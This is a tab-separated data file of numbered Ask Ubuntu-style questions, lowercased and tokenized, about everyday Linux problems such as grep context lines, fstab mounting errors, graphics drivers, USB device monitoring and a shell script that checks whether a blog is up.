27838	how to grep 2 or 3 lines , one containing the text i want , and the others just below it ?	this is a snapshot of error log : 06:16:29,933 error emailrmmanager $ :45 - exception in get message com.rabbitmq.client.alreadyclosedexception : clean connection shutdown ; reason : attempt to use closed channel at com.rabbitmq.client.impl.amqchannel.ensureisopen ( amqchannel.java:195 ) at com.rabbitmq.client.impl.amqchannel.rpc ( amqchannel.java:222 ) at com.rabbitmq.client.impl.amqchannel.rpc ( amqchannel.java:208 ) at com.rabbitmq.client.impl.amqchannel.exnwrappingrpc ( amqchannel.java:139 ) at com.rabbitmq.client.impl.channeln.basicget ( channeln.java:645 ) i do the following command : cat foo.log | grep error to get an op as : 06:16:29,933 error emailrmmanager $ :45 - exception in get message what command should i execute to get the output as 06:16:29,933 error emailrmmanager $ :45 - exception in get message com.rabbitmq.client.alreadyclosedexception : clean connection shutdown ; reason : attempt to use closed channel ie , also grep the line ( s ) after the pattern ?
27843	redirect existing windows via ssh and x11 forwarding ?	using ssh -x user @ host i can start programs on the host and x11 forwarding allows me to see their windows on the remote machine . however , i 'd like to be able to forward/redirect existing windows . how would i do that ( if it 's possible at all ) ? note , vnc is not an option ( no server installed on the host and my user has limited permissions ) .
27848	should i install through wubi or in a virtual machine on my windows machine ?	i want to install ubuntu on my windows machine and was wondering whether i should use the wubi method or rather install via a virtual machine using vmware or virtual box . what would the advantages be of either or disadvantages ?
27850	changing the default installation path to a newly installed hard disk	i am currently working on a dual-booted pc . i am using windows xp and ubuntu 10.04 lucid lynx released in april 2010 . the allocated partition to ubuntu that i am making use of has almost exhausted . current memory allocations on the pc wrt ubuntu os looks like this : bodhgaya @ pc146724-desktop : ~ $ df -h filesystem size used avail use % mounted on /dev/sda2 8.6g 8.0g 113m 99 % / none 998m 268k 998m 1 % /dev none 1002m 580k 1002m 1 % /dev/shm none 1002m 100k 1002m 1 % /var/run none 1002m 0 1002m 0 % /var/lock none 1002m 0 1002m 0 % /lib/init/rw /dev/sda1 25g 16g 9.8g 62 % /media/c /dev/sdb1 37g 214m 35g 1 % /media/ubuntulinuxstore bodhgaya @ pc146724-desktop : ~ $ cd /tmp i am trying to mount a 40gb ( /dev/sdb1 - given below ) new hard disk along with my existing ubuntu system to overcome with hard disk space related issues . i referred to the following tutorial to mount a new hard disk onto the system : - http : //www.smorgasbord.net/how-to-install-second-hard-drive-in-ubuntu-linux/ i was able to successfully mount this hard disk for ubuntu 0s . i have this new hard disk setup in /media/ubuntulinuxstore directory . the current partition in my system looks like this : bodhgaya @ pc146724-desktop : /media/ubuntulinuxstore $ sudo fdisk -l [ sudo ] password for bodhgaya : disk /dev/sda : 40.0 gb , 40000000000 bytes 255 heads , 63 sectors/track , 4863 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x446eceb5 device boot start end blocks id system /dev/sda1 * 2 3264 26210047+ 7 hpfs/ntfs /dev/sda2 3265 4385 9004432+ 83 linux /dev/sda3 4386 4863 3839535 82 linux swap / solaris disk /dev/sdb : 40.0 gb , 40000000000 bytes 255 heads , 63 sectors/track , 4863 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xfa8afa8a device boot start end blocks id system /dev/sdb1 1 4862 39053983+ 7 hpfs/ntfs bodhgaya @ pc146724-desktop : /media/ubuntulinuxstore $ now , i have a concern wrt the `` location '' where the new softwares will be installed . generally softwares are installed via the terminal and by default a fixed path is used to where the post installation set up files can be found ( i am talking in context of the drive ) . this is like the typical case of windows , where softwares by default are installed in the c : drive . these days people customize their installations to a drive which they find apt to serve their purpose ( generally based on availability of hard disk space ) . i am trying to figure out how to customize the same for ubuntu . as we all know the most softwares are installed via commands given from the terminal . my road block is how do i redirect the default path set on the terminal where files get installed to this new hard disk . this if done will help me overcome space constraints i am currently facing wrt the partition on which my ubuntu is initially installed . i would also by this , save time on not formatting my system and reinstalling ubuntu and other softwares all over again . please help me with this , your suggestions are much appreciated . my current situation : hi , this is just my current situation post the initial problem faced by me ( as per the question posted ) and how i actually tried to get around it ... thank you for your answers and comments , i am sorry , i have already tried something else which seems to have zeroed down my chances of getting back ubuntu up & running for me now on my pc . every time now i try booting ubuntu , i guess due to lack of space it no more boots on my pc . all this happened after i made one change in the system mount file located at /etc/fstab . i changed the default location where my new hard disk was originally mounted . originally it was mounted in /media/ubuntulinuxstore , i changed it to /usr . in other words i mounted /usr on this new hard disk and i guess also ended up making it a mount point for the hard disk . very soon after , the entire behavoir of ubuntu os and various simple commands like sudo , vi etc . stopped functioning . files could no longer be detected from how they were initially . i could n't undo the changes i made to /etc/fstab as i was no more the su was n't working any more and hence making me devoid of all write permissions wrt system files.. i thought in this position a reboot would be the only last resort kind of a rescue . i was in a position of having only around 10 mb free on my ubuntu system . i tried booting it , the booting did n't succeed , it seemed to be stuck . this could be now because the /dev/sda2 was now 100 % full leaving no memory ( may be virtual in particular to boot the os ) . i performed a memory test wrt ubuntu os , that was 100 % successful for me , but of no avail . this test i could perform wrt an option i got in the grub when starting my pc . i tried booting via ubuntu recovery mode , which i always get through grub as an option while starting my pc , this initially took me to a kind of interface . i tried vi /etc/fstab ... to edit the mount location of the new hard disk ( /dev/sdb1 ) to what it was originally ( /dev/sdb1 37g 214m 35g 1 % /media/ubuntulinuxstore - as shown in the question above ) . but the only command that worked for me at that point of time was cat /etc/fstab . even pico /dev/sdb1 did n't work for me . i also via grub typed 'e ' ( for edit ) and then tried to edit the kernel ( again made use of 'e ' ) with the intention to boot for a single user ( i typed single next to the already existing lines written for a file that i obtained on typing 'e ' wrt the kernel ) . finally on pressing enter , i was at a step higher , at the parent directory where the option of kernel was originally present , from there i entered option b ( to boot ) . but this did n't help at all . now finally every time i try booting ubuntu via the grub , i am put in a loop due to errors wrt hard disk and i end up back at the original grub option . all this atleast did n't have an impact on my windows os . but it seems that i have almost lost ubuntu and have to format it now freshly . i even tried out a whacky idea of disconnecting the new hard disk from the cpu , but that went in vain and my problem still continues to persist.. only seems like a miracle will save me now to retain ubuntu . any feedback or tips which i can carry to avoid such blunders in the future ? i know this leaves me with almost no hope of getting back ubuntu , but still i would gather some courage to ask one last time.. is there a way around this.. ? ? thank you very much for your patient reading and for any feedback obtained wrt my post..
27851	how can i solve this error : no rule to make target 'button icon.qml ' needed by 'all-am'.stop	this is the error when i am trying to make navit in ubuntu10.10 error : no rule to make target 'button icon.qml ' needed by 'all-am'.stop . i dont know how to solve it.somebody help me
27853	how to pass printing password via cups	i had a xerox docucenter-ii c3000 driver setup in u10.10 with the printer on the lan . everytime i send a print job it got busted with error code 016-757 which translate to invalid username and password ( known issue ) . my question is where is the location that i could input the authentication via cups configuration ? thanks
27858	can i connect to multiple networks for double bandwidth ?	if i used one wired connection to isp_1 and another wireless connection to isp_2 , can ubuntu benefit from both , such as running bit-torrent and getting twice the bandwidth ?
27862	how can i increase the mouse pointer speed beyond the limits set by the mouse preferences dialog ?	in the mouse preferences dialog i 've set the acceleration to max and the sensitivity to min and the mouse pointer is not exactly sluggish , but i 'd like to make it even faster . is it possible to be done by setting some value in the procfs or something ? thanks !
27863	fast video stream encoder	this is not specific ubuntu/linux question but i hope someone can help me . i am doing some video stream server which on slow pc ( cpu 1ghz , bad gpu ( via ) ) . does someone knows which codec should i use ? the source is 720x576 yuv ( pal ) which is too big to stream directly ( took all 100mbit lan bandwidth ) . i want to get stream caa 200kb/s so it would be suitable also over internet .
27864	best video converter	i need a good video converter software that can convert many video formats from one ot the other . on windows i found format factory to be good . i would like its equivalent or something better on ubuntu .
27869	unwanted application starts automatically when i login	when i log in to my ubuntu system several applications that i added to startup list ( by using system- > preferences- > startup application ) start automatically . last times i am seeing that among those startup applications there is also another one called `` konqueror '' ( which is a browser and browse me automatically http : //unix.stackexchange.com/users/4458/bakhtiyor ) which starts automatically . but i did n't add this application to startup list . i looked for every place that i knew to see why it was loading automatically but i could not find it . could anybody help me to find out how that application is starting up automatically when a session starts please ? note that i do n't have root permission in my system , because it is in my working place . i am using ubuntu desktop and gnome . thank you .
27871	link to specific tomboy note	i 'm trying to link to a specific tomboy note from the panel or from the desktop . i do n't really like the notifaction `` click , dropdown , click '' way for a specific note i 'm using , so i want to be able to open it with one seperate button . i could n't find it on the website of tomboy , nor did google help me on this .
27877	freezes if desktop effects is used	i have found that using desktop effects in ubuntu versions later than 8.10 causes the desktop to freeze after a few seconds on my pc . the command lspci -nn gave the following 00:02.0 vga compatible controller [ 0300 ] : intel corporation 82945g/gz integrated graphics controller [ 8086:2772 ] ( rev 02 ) and with lspci -k i have 00:02.0 vga compatible controller : intel corporation 82945g/gz integrated graphics controller ( rev 02 ) kernel driver in use : i915 kernel modules : i915 the intel graphics cards seems to have some performence issues with xorg driver . however i have not noticed any freeze in ubuntu 8.10 . there are some workarounds at https : //wiki.ubuntu.com/x/bugs/lucidi8xxfreezes to make them work . but i ca n't find out what workaround should i do with my graphics controller . i have tried workaround f but it did not help . can anyone help me find a workaround for my graphics card ? and is it actually possible to use desktop effect in this graphics card ?
27885	why is the default virtual terminal number 7 ?	why is the default virtual terminal in ubuntu tty7 ? is there any sort of precedent for this , or was that just the number that first came to mind ?
27887	gui keyword confusion	ive been using linux for some time , and ive never quite got my head around the various keywords attached to the gui . i think i understand the difference between the likes of kde and gnome - they are collections of applications and other software that make up a given gui environment . however a quick read through any vaguely technical linux websites will reveal terms like : murrine clearlooks gtk beryl metacity window manager which if im honest , i have no real idea what they mean and how they all relate to each other . can anybody clarify ?
27894	get window size in shell	i would like to get the size of the current window from a shell script ... really not much else to say ... i would prefer to use wmctrl .
27895	evolution mapi for thunderbird	is there any plugin which can retrieve ms exchange emails in thunderbird just like evolution-mapi & evolution-exchange does for evolution ? what happened if the server does not have imap enabled ?
27896	will the macbook pro early 2011 work better with ubuntu than the air late 2010 ?	i got this late 2010 11 '' macbook air . i 'm having issues with nvidia graphics , especially with gnome shell . i 'm thinking about selling this to switch to the new macbook pro , particularly the entry level 13 '' ( see specs here ) , because of the intel hd graphics 3000 . i assume that it will be more foss-friendly . i just want to point out that there are non-negotiable reasons why i 'm keeping an apple hardware at the moment , so let 's keep this on topic . will the macbook pro early 2011 work better with ubuntu than the air late 2010 ? any other factors than the graphics hardware ? should we expect better nvidia graphics anytime soon ?
27898	where do my programs get installed ?	coming from windows i 'm used to having everything installed in c : \program files\company\product . on ubuntu i 'm totally stumped . it seems like everything i install winds up somewhere different . somethings are in /bin some in /home/myuser and others in /etc or /usr . i ca n't seem to figure this out . in particular i 'm trying to find where they 're located so i can either setup shortcuts on the task bar or associate them with other programs ( like my greasemonkey editor ) but i 'm not having any luck .
27907	compiz slow under proprietary nvidia driver	i am using ubuntu 10.10 and have problem with proprietary nvidia driver for my geforce gts 250 . i have issue with poor compiz performance . and there is also open-source `` noueau '' driver . proprietary : i tried many versions but neither works fast on desktop . this means 30 fps without heavy effects . currently i am using version 270.18 . even normal desktop use feels bad ( moving windows ) in games ( and 3d benchmark ) it is really good ! ( unigine heaven works good ! ) open-source `` nouveau '' : very fast on desktop with heavy effects ( blur , ... ) . i have 300 fps and more , even in expo mode . games were good but not as good as prop . and driver causes xorg to crash even the latest ( ppa : xorg-edgers/nouveau ) , so i switched back to proprietary . i also have computer with ubuntu 10.04 , geforce 8600gt and drivers around 185.x and compiz works great there . there is similar question nvidia proprietary driver performance in 10.10 which version of nvidia ( prop ) driver is fast in compiz in ubuntu 10.10 ? how do you install a specific version of nvidia driver ? is it the case that each newer driver works slower on compiz ? edit : i tested 8600gt and gts250 on ubuntu 10.04 under 197.x.x drivers . performance in compiz and games are great ! so ubuntu 10.10 with 260.x.x or newer driver is not good for compiz ?
27911	encrypt home drive after installation	i declined to encrypt to my home drive whilst installing ubuntu . is it possible to encrypt it after installation ? if so , how ?
27921	xorg crash on msi cx623 notebook	i have a msi cx623 laptop and i have installed the ubuntu 10.10 , x64bit version on it . the problem is after i activated the nvidia driver from additional drivers . after restarting xorg crashes . this laptop uses the optimus technology of nvidia , is this supported ? the full specification of this laptop are here : http : //www.msi.com/product/nb/cx623.html # / ? div=specification how can i solve this problem ?
27925	sftp gui +ssh key	is there any application that allows connecting via sftp using private keys rather than password ? i know that i can do that via nautilus , but i would prefer some standalone application .
27927	why does network-manager close when it can not bind to any connection ?	when network-manager is not able to bind my ubuntu to any connection , after a while it closes . the icon in the notification area ( or indicator area ) disappears , and it does not run any more . for instance this happens when there is really no ethernet network nor wireless one . nonetheless this is a problem , since i often plug in my ethernet cable long after having booted my computer . as a hack i therefore hit alt + f2 , and type nm-applet . but i am not satisfied with this solution , because i think it is not intuitive enough . is there a way to keep network-manager always running ? i have network-manager 0.8.1 on ubuntu 10.10 , but this has been so for a long time , at least for one year .
27929	unable to mount 1tb usb external hdd - error	i 'm getting an error when i plug in my 1tb usb external hdd , the weird thing about this is that it was working fine before and i 've been using it for about a couple of months now . yesterday i compressed one of the folders which had about 120gb of data but the compression failed after an hour and i decided to unmount the drive and shut everything down . today when i tried to plug in the drive i got the following error : error mounting : mount : wrong fs type , bad option , bad superblock on /dev/sdc , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so output of cat /proc/partitions below muzikayise @ muzikayise-supercom : ~ $ sudo fdisk -l /dev/sdc disk /dev/sdc : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x39dcba64 device boot start end blocks id system please will someone kindly assist with this ? thanks in advance , muzi 20110203 : ok i had a look and as jet suggested the partition table is messed up , not sure how that happened . have a look at this below partition details : muzikayise @ muzikayise-supercom : ~ $ sudo sfdisk -d /dev/sdc > pt.txt muzikayise @ muzikayise-supercom : ~ $ cat pt.txt # partition table of /dev/sdc unit : sectors /dev/sdc1 : start= 0 , size= 0 , id= 0 /dev/sdc2 : start= 0 , size= 0 , id= 0 /dev/sdc3 : start= 0 , size= 0 , id= 0 /dev/sdc4 : start= 0 , size= 0 , id= 0 i 'm gon na try fix this , not sure how yet but will google for solutions
27932	will the latest versions of firefox be brought into old ubuntu releases ?	will updated versions of firefox land in old ubuntu releases , such as lucid and maverick , when they are released by mozilla ?
27933	what are post-installation triggers ?	what are post-installation triggers ? these are executed when upgrading software .
27936	can and should udf be used as a hard drive format ?	several time recently i 've seen udf suggested as the solution to a cross platform format for a drive used on linux , mac os x and windows xp and above . i 've searched here and not found the same suggestion ( most are suggesting ntfs-3g which seems to cost money and is n't preinstalled on a mac ) . so my question is : how is this done right , and has anyone done this ? have you then filled up the drive and deleted some files to make space finding that everything works like a real r/w format even though it seems to have been primarily a write once format ? call me crazy but i 'd really like it if the udf system would also automount and be writable by the logged in user . what i 've tried so far ( udftools formatting as mentioned by kicsyromy ) does n't address this wish .
27948	usb device changes using udev and d-bus	i am trying to get a list of currently plugged in usb devices in ubuntu 10.10 and monitor changes that happen , like devices being plugged in or out using udev and d-bus . i 'm fairly new to programming using d-bus . i saw one example : `` linux : how to detect is usb keyboard is plugged and unplugged '' . problem is that it uses hal and i know that hal is deprecated . i found some working code , but it 's working only with storage devices such as usb sticks , media players or cd-rom drives . i want the whole thing : mice , keyboards , usb cameras , chargers ; anything that is plugged in to the usb . how can i listen d-bus events for any usb device plug and unplug ? this is basically what i have now ( also ) : import dbus import gobject from dbus.mainloop.glib import dbusgmainloop def device_added_callback ( device ) : print 'device % s was added ' % ( device ) def device_changed_callback ( device ) : print 'device % s was changed ' % ( device ) # must be done before connecting to dbus dbusgmainloop ( set_as_default=true ) bus = dbus.systembus ( ) proxy = bus.get_object ( `` org.freedesktop.udisks '' , `` /org/freedesktop/udisks '' ) iface = dbus.interface ( proxy , `` org.freedesktop.udisks.device '' ) devices = iface.get_dbus_method ( 'enumeratedevices ' ) ( ) print ' % s ' % ( devices ) # addes two signal listeners iface.connect_to_signal ( 'deviceadded ' , device_added_callback ) iface.connect_to_signal ( 'devicechanged ' , device_changed_callback ) # start the main loop mainloop = gobject.mainloop ( ) mainloop.run ( )
27951	messed up my firefox 4 settings	i installed some extensions for firefox and now my tabs bar is gone and on the left , there are some white pixels where they should be brown . i tried deleting the settings file in etc/firefox/prefs , but without success . how can i restore the original settings ?
27954	how can i check internet connectivity in a console ?	is there an easy way to check internet connectivity from console ? i am trying to play around in a shell script . one idea i seem is to wget -- spider http : //www.google.co.in/ and check the http response code to interpret if the internet connection is working fine . but i think there must be easy way without the need of checking a site that never crash ; ) edit : seems like there can be a lot of factors which can be individually examined , good thing . my intention at the moment is to check if my blog is down . i have setup cron to check it every minute . for this , i am checking the http response code of wget -- spider to my blog . if its not 200 , it notifies me ( i believe this will be better than just pinging it , as the site may under be heavy load and may be timing out or respond very late ) . now yesterday , there was some problem with my internet . lan was connected fine but just i could n't access any site . so i keep on getting notifications as the script could n't find 200 in the wget response . now i want to make sure that it displays me notification when i do have internet connectivity . so , checking for dns and lan connectivity is a bit overkill for me as i do n't have that much specific need to figure out what problem it is . so what do you suggest how i do it ? here is my script to keep checking downtime for my blog : # ! /bin/bash # sending the output of the wget in a variable and not what wget fetches result=`wget -- spider http : //blog.ashfame.com 2 > & 1` flag=0 # traverse the string considering it as an array of words for x in $ result ; do if [ `` $ x '' = '200 ' ] ; then flag=1 # this means all good fi done if [ $ flag -eq '0 ' ] ; then # a good point is to check if the internet is working or not # check if we have internet connectivity by some other site result=`wget -- spider http : //www.facebook.com 2 > & 1` for x in $ result ; do if [ `` $ x '' = '200 ' ] ; then flag=1 # this means we do have internet connectivity and the blog is actually down fi done if [ $ flag -eq '1 ' ] ; then display=:0 notify-send -t 2000 -i /home/ashfame/dropbox/ubuntu/icons/network-idle.png `` downtime alert ! '' `` http : //blog.ashfame.com/ is down . '' fi fi exit this way i need to check for internet connectivity only where there is an issue with my blog response code . its a bit heavy ( as i am not using ping ) but should not give any false positives . right ? also how can i randomize pinging to a different site everytime , like facebook , google , yahoo etc . also ( i was trying to avoid any i/o ) i can write to a log file by which i can check the count of downtime checks and then skip further checks till the site is down or cause longer checks ( 10mins instead of every min ) . what do you think ?
27962	installing drivers for an ati 6950	is there any way to get ubuntu to recognise an ati 6950 ? i have tried installing the proprietary ati drivers , but these do not seem to work properly . it seems to screw up the gnome desktop , and starts booting into terminal . i 'm somewhat of a linux newbie , so not really sure whats going wrong . i do n't want to game on ubuntu , i just want it to recognise my dual monitor setup rather than mirroring the monitors , so any driver that does this is fine by me . it seems like the open source ati radeon drivers will not support the 6950/6970 for some time , at least until kernel 2.6.38 is released . the card is also flashed with the 6970 firmware , not sure if this is important . i am running a 64 bit version of ubuntu , i installed ubuntu server 10.10 , then installed gnome-desktop .
27963	error encountered compiling kernel 2.6.35-25.44	i downloaded the linux-source-2.6.35 package and tried to compile it using the command `` fakeroot make-kpkg -- append-to-version=.dbg kernel_image kernel_source kernel_headers -- initrd '' after `` make menuconfig '' . the image .deb file is produced and installs fine , but an error stops the build process while trying to make the source package : scripts/makefile.clean:17 : /home/ade/linux-source-2.6.35/debian/linux-source-2.6.35.10.dbg/usr/src/linux-source-2.6.35.10.dbg/crypto/makefile : no such file or directory make [ 1 ] : *** no rule to make target `/home/ade/linux-source-2.6.35/debian/linux-source-2.6.35.10.dbg/usr/src/linux-source-2.6.35.10.dbg/crypto/makefile ' . stop . make : *** [ _clean_crypto ] error 2 sure enough , the folder linux-source-2.6.35/debian/linux-source-2.6.35.10.dbg/usr/src/linux-source-2.6.35.10.dbg/crypto does not exist ( although all of the other kernel source folders appear to be there ) . i have n't even been able to determine where the folder is supposed to be copied over , or what 's supposed to invoke clean . am i doing something wrong here ? it should be noted that i am running 10.04 .
27964	git authentication with active directory user	i use likewise-open to connect to a windows ad , and i am able to see ad users . what should i do to authenticate a user for git when i push to and pull from a git repository ? where is this configured ?
27966	webex webmeeting hangs at 64 %	whenever i try to open webmeeting through at & t webex , it loads till 64 % and then hangs.the at & t faqs say that linux machines can host webmeetings as long as you have java installed . i have installed the latest sun-java-jre from sun ( oracle ) and have removed openjdk & icedtea altogether . has anyone else tried this ? any suggestions on fixing it ?
27967	how can i reduce the number of ttys ?	i do n't need 7 ttys ( or do i ? ) . so how do i reduce this number to 3 ?
27968	update manager fails to calculate upgrade	recently , when running the update manager , and after checking package info . shows this message . could not calculate the upgrade an unresolvable problem occurred while calculating the upgrade . please report this bug against the 'update-manager ' package and include the following error message : 'e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . '
27979	in networkmanager , my nm-dispatcher is never called	i 've got two ubuntu laptops ( both 10.10 ) . one is a new maverick install and the other has been upgraded many times since 9.04 . on the latter , setting up a custom script hook in /etc/networkmanager/dispatcher.d/ worked instantaneously . however , on the older laptop , i ca n't get nm-dispatcher to get called , or at least to execute its hooks . i 've tried to run networkmanager -- no-daemon -log-level=debug but there is no mention of nm-dispatcher . how can i have a look at the source ( i looked into the git repo but could not find anything . find why the nm-dispatcher never gets called .
27982	bypass rabbitmq `` ok '' dialog on install	when i install rabbitmq-server package on lucid , i always get a warning about upgrading from a previous version ( even though no previous version is installed ) , and then i have to hit enter to dismiss the dialog . is there any way to disable this prompt so i can do the install unattended ?
27984	will packages work with older ubuntu releases ?	e.g. , will natty packages work on maverick ?
27985	is there a way to revert the entire system to a set point in time ?	i have a development computer running ubuntu . i often mess things up and end up reconfiguring everything on the machine the way i like it . i would prefer to be able to revert my system to a set point . what is the best way to do this ? i would prefer not to use virtualization because of the performance hit .
27988	how to migrate from wubi to a regular installation ?	i recently installed ubuntu through wubi and i love it enough that i am ready to ditch windows ! my set up is like this : drive 1 : 80 gb ssd windows 7 drive 2 : 320 gb hdd ubuntu ( installed through wubi ) drive 3 : 1000 tb ntfs media drive what i want to do is move the ubuntu installation from the 320 gig hard drive to my ssd and totally get rid of windows . would be great if i could preserve my current ubuntu install during the process since it 's finally working . : - )
27989	firefox 4 stores passwords , but suddenly forgot that it did ?	i am using firefox 4 as my default browser , but this is probably file system related . i will describe the problem and hopefully someone can point me in the right direction ? today i was using the browser as normal , all sign ins worked as usual , everything was normal . then when i got back home tonight and opened it , none of my saved usernames/passwords would autofill/auto-signin anymore . i am guessing this must be something filesystem related , and it only happened this one time seemingly at random , so i do n't think it is a firefox 4 bug . in fact , i think it might be something to do with suspending the system before i left ? anyone have any idea ?
27990	how can i get multitouch enabled on my sentelic touchpad ( msi x350 notebook ) ?	i understand my msi x350 notebook comes with a sentelic trackpad , which supports multi-touch ( according to the msi website ) . is there a way to enable multitouch on ubuntu ? i 've been having difficulty finding info about this on google , and since it 's not a synaptics touchpad i have n't been able to find much info in ubuntu docs . my mouse preferences does n't have a trackpad tab like it does on , say , a macbook . running `` xinput list '' returns : fspps/2 sentelic fingersensingpad id=11 and in my xorg.0.log : [ 17.481 ] ( ii ) config/udev : adding input device fspps/2 sentelic fingersensingpad ( /dev/input/event6 ) [ 17.481 ] ( ** ) fspps/2 sentelic fingersensingpad : applying inputclass `` evdev pointer catchall '' [ 17.481 ] ( ** ) fspps/2 sentelic fingersensingpad : always reports core events [ 17.481 ] ( ** ) fspps/2 sentelic fingersensingpad : device : `` /dev/input/event6 '' [ 17.500 ] ( ii ) fspps/2 sentelic fingersensingpad : found 11 mouse buttons [ 17.500 ] ( ii ) fspps/2 sentelic fingersensingpad : found scroll wheel ( s ) [ 17.500 ] ( ii ) fspps/2 sentelic fingersensingpad : found relative axes [ 17.500 ] ( ii ) fspps/2 sentelic fingersensingpad : found x and y relative axes [ 17.500 ] ( ii ) fspps/2 sentelic fingersensingpad : configuring as mouse [ 17.500 ] ( ** ) fspps/2 sentelic fingersensingpad : yaxismapping : buttons 4 and 5 [ 17.500 ] ( ** ) fspps/2 sentelic fingersensingpad : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 [ 17.500 ] ( ii ) xinput : adding extended input device `` fspps/2 sentelic fingersensingpad '' ( type : mouse ) [ 17.500 ] ( ii ) fspps/2 sentelic fingersensingpad : initialized for relative axes . [ 17.500 ] ( ii ) config/udev : adding input device fspps/2 sentelic fingersensingpad ( /dev/input/mouse0 )
27991	what language ( s ) can i use in libreoffice for macro scripting ?	not finding any info online ; i hope somebody here knows . it was python in openoffice ; is it still python ? or are they moving to gasp vba ?
27993	removing unneeded graphical drivers ?	i have an intel gma 4500m graphic card . in synaptic package manager i found out that there are a bunch of installed packages for nvidia and ati . i was wondering if i can remove these packages since i have an intel graphics card . any recommendations for uninstalling unneeded packages ?
27994	installing gtk-config and/or fsv , missing gtk dependencies	i 'm trying to install the file system visualizer ( think `` it 's a unix system ! i know this ! '' from jurassic park ) on ubuntu 10.10 . i 've got the .tar.gz downloaded , and extracted . however , when i ./configure , i get this output : loading cache ./config.cache checking for a bsd compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking whether make sets $ { make } ... yes checking for working aclocal ... found checking for working autoconf ... found checking for working automake ... found checking for working autoheader ... found checking for working makeinfo ... missing checking for gcc ... gcc checking whether the c compiler ( gcc ) works ... yes checking whether the c compiler ( gcc ) is a cross-compiler ... no checking whether we are using gnu c ... yes checking whether gcc accepts -g ... yes checking how to run the c preprocessor ... gcc -e checking for ranlib ... ranlib checking for posixized isc ... no checking for dirent.h that defines dir ... yes checking for opendir in -ldir ... no checking for ansi c header files ... yes checking whether time.h and sys/time.h may both be included ... yes checking for strings.h ... yes checking for sys/time.h ... yes checking for unistd.h ... yes checking for working const ... yes checking for mode_t ... yes checking for uid_t in sys/types.h ... yes checking for pid_t ... yes checking for size_t ... yes checking for comparison_fn_t ... yes checking for st_blocks in struct stat ... yes checking whether struct tm is in sys/time.h or time.h ... time.h checking for working alloca.h ... yes checking for alloca ... yes checking for working fnmatch ... yes checking for strftime ... yes checking for getcwd ... yes checking for gettimeofday ... yes checking for mktime ... yes checking for strcspn ... yes checking for strdup ... yes checking for strspn ... yes checking for strtod ... yes checking for strtoul ... yes checking for scandir ... yes checking for inline ... inline checking for off_t ... yes checking for unistd.h ... ( cached ) yes checking for getpagesize ... yes checking for working mmap ... yes checking for argz.h ... yes checking for limits.h ... yes checking for locale.h ... yes checking for nl_types.h ... yes checking for malloc.h ... yes checking for string.h ... yes checking for unistd.h ... ( cached ) yes checking for sys/param.h ... yes checking for getcwd ... ( cached ) yes checking for munmap ... yes checking for putenv ... yes checking for setenv ... yes checking for setlocale ... yes checking for strchr ... yes checking for strcasecmp ... yes checking for strdup ... ( cached ) yes checking for __argz_count ... yes checking for __argz_stringify ... yes checking for __argz_next ... yes checking for stpcpy ... yes checking for lc_messages ... yes checking whether nls is requested ... yes checking whether included gettext is requested ... no checking for libintl.h ... yes checking for gettext in libc ... yes checking for msgfmt ... /usr/bin/msgfmt checking for dcgettext ... yes checking for gmsgfmt ... /usr/bin/msgfmt checking for xgettext ... /usr/bin/xgettext checking for gtk-config ... no checking for gtk - version > = 1.2.1 ... no *** the gtk-config script installed by gtk could not be found *** if gtk was installed in prefix , make sure prefix/bin is in *** your path , or set the gtk_config environment variable to the *** full path to gtk-config . configure : error : can not find proper gtk+ version obviously it 's looking for gtk-config . however , apparently it does n't exist in the repos anymore . then this post mentioned that gtkglarea solved their problem , as mentioned in this file . of course that poster neatly forgets to mention exactly what and how gtkglarea solved their problem , and google is mostly devoid of information on the problem . so i come here asking for help ! i would like to install fsv , but it tells me gtk-config does n't exist . how can i fix this problem in ubuntu 10.10 ? thanks ! edit so with the help of robert , this is what i had to do : from the dapper repositories i downloaded : libgtk1.2-dev_1.2.10-18_i386.deb libgtk1.2_1.2.10-18_i386.deb libgtk1.2-common_1.2.10-18_all.deb gtkglarea5-dev_1.2.3-2ubuntu4_i386.deb gtkglarea5_1.2.3-2ubuntu4_i386.deb libglib1.2_1.2.10-10.1build1_i386.deb libglib1.2-dev_1.2.10-10.1build1_i386.deb then i had to install : libglib1.2 libglib1.2-dev libgtk1.2-common libgtk1.2 libgtk1.2-dev gtkglarea5 gtkglarea5-dev i used sudo gdebi < file > .deb for most of them ( it tells you dependencies better , if you missed one ) . in a few cases , gdebi does not do the right thing , and dies . when this happens , use dpkg -i < file > .deb and it should work .
27997	which hard disk drive is which ?	i want to know which hard disk drive corresponds to which device path . it 's trivial to match the hard disk stats ( brand , size ) with the dev path , but i want more . i want to know which drive is which inside my case . what 's a good way to go about getting this info ? i would prefer not to tear apart my server to remove all the drives , then add back one by one . i am willing to preform reboots . the drives are inconveniently scrunched together in the case . the label information is hidden . i can open the case . most disks are sata , so theoretically hot swappable . so , unplugging and tracing cables might help in answering .
27999	xfce session with gnome in background	i recently installed xfce on my ubuntu 10.04 and it runs finely but with an issue . everytime i login into my xfce session i see the background image of gnome session and after few seconds it disappears which gives me the impression that xfce session is running over an already running gnome session . if that is really the case then it might also be eating into my system 's ram which could be a bug . all helps and suggestions are welcome .
